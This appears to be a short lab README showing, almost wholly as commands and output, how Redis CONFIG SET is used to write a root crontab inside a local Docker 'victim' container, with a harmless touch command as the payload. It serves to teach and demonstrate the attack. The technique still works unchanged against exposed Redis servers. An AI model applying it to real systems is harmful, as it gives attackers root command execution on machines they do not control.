redis-exploitation
CONFIG SET (For educational purposes only)
Build
$ docker build -t victim .
Run
$ docker run -d --name victim victim
Attack
$ docker exec -it victim bash
[root@34ea33cb2eb2 /]# ls /var/spool/cron/
[root@34ea33cb2eb2 /]# redis-cli
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
[root@34ea33cb2eb2 /]# cat /var/spool/cron/root
REDIS0007 redis-ver3.2.12
redis-bits@ctime]&used-meme
payload!
*/1 * * * * /bin/touch /tmp/foo
5[root@34ea33cb2eb2 /]#